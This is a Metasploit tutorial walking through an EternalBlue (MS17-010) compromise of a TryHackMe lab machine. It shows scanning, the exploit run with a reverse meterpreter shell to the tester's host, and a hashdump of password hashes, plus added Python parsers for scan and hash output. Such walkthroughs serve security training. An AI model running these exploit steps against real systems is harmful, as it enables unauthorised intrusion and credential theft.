Metasploit, a tool for penetration testing and cracking the security of ICT systems, is one of the most well-known open source projects in the security world. In this article, we will take a look at how to navigate its interface and use its main functionalities.
The first launch
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
msf6 >
The first time we run it, we get information about the number of available exploits, auxiliary modules and other scripts. What exactly are they?
- exploits - modules that deliver a payload to a target. When working with msf we will use them most often,
- auxiliary - modules covering all the available scanners, fuzzers, sniffers, etc.,
- post - modules used for post-exploitation of a compromised machine,
- payloads - code that runs on the compromised system and lets us interact with it. There are three types of payloads - singles, staged and stages. They differ in their level of sophistication,
- encoders - during a penetration test, our attempted attacks can be detected by security software, which wastes the tester's time. To avoid this, encoders are used: their task is to hide the exploit so that it goes undetected,
- nops - No Operation instructions, which simply pass execution on to the next memory address. We use nops to reach the desired location in memory,
- evasion - modules used to create payloads that bypass antivirus software.
Metasploit in practice
So that we can focus on explaining the whole process of working with Metasploit, all the commands used in the example are also collected at the end of the article in the "cheatsheet" section.
The machine we will be attacking is the Blue machine available on TryHackMe. We start by launching it and scanning all available ports, then run the vulnerability scanner. We could use one of the available auxiliary modules to check the ports, but undoubtedly the best tool for this is nmap - no need to complicate your life unnecessarily. If you don't already know how it works, we recently published an extensive article about it.
┌──(figaro㉿kali)-[~]
└─$ nmap --script vuln 10.10.160.42
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 15:15 EST
Nmap scan report for 10.10.160.42
Host is up (0.062s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 97.72 seconds
This way we get information about the potential vulnerabilities of the target machine. So let's try to find one of them in the Metasploit database.
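The nmap report above is easier to act on once each vulnerable block is turned into a structured finding. As an added example, not code from the original article, the Python below parses a report in that format and returns one finding per "State: VULNERABLE" block with its port, script name, title, CVE IDs and risk factor, then lists the HIGH-rated CVEs for remediation priority. The sample report is a constructed, trimmed copy of the output above; nmap indents the nested script lines under "| script:", and the parser relies on that indentation (the article's copy lost it).

```python
import re
from typing import Dict, List, Optional

# Constructed sample: a trimmed copy of the `nmap --script vuln` report above,
# with nmap's original indentation of nested script lines restored.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.160.42
PORT     STATE SERVICE
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|_    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 97.72 seconds
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+\w+\s+\S+")
# A script header is "| name:" or "|_name:" with the name right after the bar;
# nested fields are indented further, so they never match this pattern.
SCRIPT_RE = re.compile(r"^\|(?:_| )([A-Za-z0-9-]+):\s*(.*)$")
STATE_RE = re.compile(r"^State:\s*(\w+)")
RISK_RE = re.compile(r"^Risk factor:\s*(\w+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_vuln_scan(text: str) -> List[Dict]:
    """One finding per 'State: VULNERABLE' block: port, script, title, CVEs, risk."""
    findings: List[Dict] = []
    port = "host"                      # output under "Host script results"
    script: Optional[str] = None
    title: Optional[str] = None
    current: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if PORT_RE.match(line):
            port = line.split()[0]
            script = title = current = None
            continue
        if line.startswith("Host script results"):
            port = "host"
            script = title = current = None
            continue
        if not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script, title, current = m.group(1), None, None
            continue
        body = line.lstrip("|_").strip()
        if not body or body == "VULNERABLE:":
            continue
        m = STATE_RE.match(body)
        if m:
            if m.group(1) == "VULNERABLE":
                current = {"port": port, "script": script, "title": title,
                           "cves": [], "risk": None}
                findings.append(current)
            else:
                current = None          # e.g. "State: NOT VULNERABLE"
            continue
        if current is not None and body.startswith("IDs:"):
            current["cves"].extend(CVE_RE.findall(body))
            continue
        m = RISK_RE.match(body)
        if m and current is not None:
            current["risk"] = m.group(1).upper()
            continue
        title = body   # the last free-text line before "State:" is the title
    return findings


def high_risk_cves(findings: List[Dict]) -> List[str]:
    """CVE IDs of findings that nmap rated HIGH, for remediation priority."""
    return sorted({c for f in findings if f["risk"] == "HIGH" for c in f["cves"]})


if __name__ == "__main__":
    found = parse_vuln_scan(SAMPLE_SCAN)
    for f in found:
        print(f"{f['port']:>9} {f['script']:<20} {f['risk']:<7} "
              f"{', '.join(f['cves'])}  {f['title']}")
    print("HIGH:", high_risk_cves(found))
```

The title is taken as the last free-text line before each "State:" line, which is where nmap's vuln scripts print it; lines that are not vulnerability blocks (such as the ssl-ccs-injection timeout) produce no finding.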
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Next, we will use the auxiliary scanner module and display its options to see what information it will give us.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
As you can see, you need to specify the RHOSTS variable before proceeding - let's do that, and then run the scanner.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.160.42
rhosts => 10.10.160.42
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 10.10.160.42:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.160.42:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Metasploit has confirmed that the host is vulnerable to MS17-010 (EternalBlue). The next thing we will try to accomplish is to run the corresponding exploit to compromise the machine. Before that, we again need to set the target in RHOSTS.
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.160.42
RHOSTS => 10.10.160.42
In addition, if you are using a VPN, you will need to set the LHOST variable - the address the reverse payload connects back to.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.9.6.223
LHOST => 10.9.6.223
Now all that remains is to run the exploit with the run or exploit command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.9.6.223:4444
[*] 10.10.21.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.21.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.21.28:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.21.28:445 - The target is vulnerable.
[*] 10.10.21.28:445 - Connecting to target for exploitation.
[+] 10.10.21.28:445 - Connection established for exploitation.
[+] 10.10.21.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.21.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.21.28:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.21.28:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.21.28:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.21.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.21.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.21.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.21.28:445 - Starting non-paged pool grooming
[+] 10.10.21.28:445 - Sending SMBv2 buffers
[+] 10.10.21.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.21.28:445 - Sending final SMBv2 buffers.
[*] 10.10.21.28:445 - Sending last fragment of exploit packet!
[*] 10.10.21.28:445 - Receiving response from exploit packet
[+] 10.10.21.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.21.28:445 - Sending egg to corrupted connection.
[*] 10.10.21.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.21.28
[*] Meterpreter session 9 opened (10.9.6.223:4444 -> 10.10.21.28:49169) at 2021-11-23 18:56:55 -0500
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
As you can see, we land in the meterpreter shell by default. What is it? It is one of the payloads of the Metasploit attack, and it lets us explore the machine while leaving as few traces as possible. So let's try changing the shell from meterpreter to a plain shell. First, return to the Metasploit console with the background command - this does not kill the active session. The full list of sessions can be viewed with the sessions command.
meterpreter > background
[*] Backgrounding session 9...
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
9 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.9.6.223:4444 -> 10.10.21.28:49169 (10.10.21.28)
To use shell instead of meterpreter, we can use one of the post module scripts - shell_to_meterpreter.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
In order for the script to work properly, we need to complete the SESSION variable. From the previous command, we know that the id of the session we are interested in is equal to 9.
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 9
SESSION => 9
What remains is to run the module. Or, instead of using the post module, we can simply type the shell command in the meterpreter.
meterpreter > shell
Process 2064 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
We can see that we are running as NT AUTHORITY\SYSTEM, the local system account. This gives us unrestricted access to all local system resources.
The next challenge is to find a non-default user and crack their password. To list all users with their password hashes, we will use the hashdump command.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Now it remains to crack the password using, for example, John the Ripper, and to find the hidden flags in system files - we will not go through this step by step, as that is not the intention of the current article.
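Before handing a dump to a cracker it is worth reading what it already says. As an added example, not code from the original article, the Python below parses hashdump's pwdump-style lines (user:RID:LM hash:NT hash:::) and answers the questions a defender or tester asks first: which accounts are non-default (RID 1000 and above), which have an empty password, and whether legacy LM hashes are still being stored. The two constants are the well-known hashes of the empty password, which also appear in the output above; the sample dump is constructed from the lines above.

```python
from typing import Dict, List

# Well-known hashes of the empty password (LM and NT); they also appear in the
# hashdump output above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX = set("0123456789abcdef")

# Constructed sample in pwdump format, copied from the hashdump output above.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


def parse_hashdump(text: str) -> List[Dict]:
    """Parse pwdump lines; raise ValueError on anything not in that format."""
    entries: List[Dict] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            raise ValueError(f"line {lineno}: not in pwdump format: {line!r}")
        user, rid = parts[0], int(parts[1])
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32 or not set(lm + nt) <= HEX:
            raise ValueError(f"line {lineno}: hash fields must be 32 hex chars")
        entries.append({
            "user": user,
            "rid": rid,
            "lm": lm,
            "nt": nt,
            # Built-in accounts (Administrator=500, Guest=501, ...) have RIDs
            # below 1000; accounts created later start at 1000.
            "builtin": rid < 1000,
            "empty_password": nt == EMPTY_NT,
            # Anything other than the empty-LM constant means the legacy,
            # easily cracked LM format is still being stored on this host.
            "lm_stored": lm != EMPTY_LM,
        })
    return entries


def non_default_accounts(entries: List[Dict]) -> List[str]:
    """Names of accounts that are not built-in (RID >= 1000)."""
    return [e["user"] for e in entries if not e["builtin"]]


def audit(entries: List[Dict]) -> Dict[str, List[str]]:
    """Map each account to its password-hygiene issues (empty list = none).
    hashdump does not show whether an account is disabled, so an empty-password
    built-in account still has to be checked against the account status."""
    report: Dict[str, List[str]] = {}
    for e in entries:
        issues = []
        if e["empty_password"]:
            issues.append("empty password")
        if e["lm_stored"]:
            issues.append("LM hash stored")
        report[e["user"]] = issues
    return report


if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_DUMP)
    print("non-default accounts:", non_default_accounts(entries))
    for user, issues in audit(entries).items():
        print(f"{user:<15} {', '.join(issues) or 'ok'}")
```

On the sample dump the only non-default account is Jon, and the two built-in accounts carry the empty-password NT hash; whether that is a real finding or just a disabled account is something the dump alone cannot tell you.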
Cheatsheet
- search <regex> - search for a module matching the given regex,
- use exploit/<exploitPath> - select the exploit we want to use,
- set payload <payload> - set the payload,
- options - display the options of the currently selected module,
- set <option> <value> - set the value of the selected option,
- exploit / run - run the previously selected exploit / module.
Sources
https://www.metasploit.com/
https://www.offensive-security.com/metasploit-unleashed/
https://www.tutorialspoint.com/metasploit/metasploit_payload.html
https://github.com/security-cheatsheet/metasploit-cheat-sheet
https://tryhackme.com/room/blue
https://github.com/openwall/john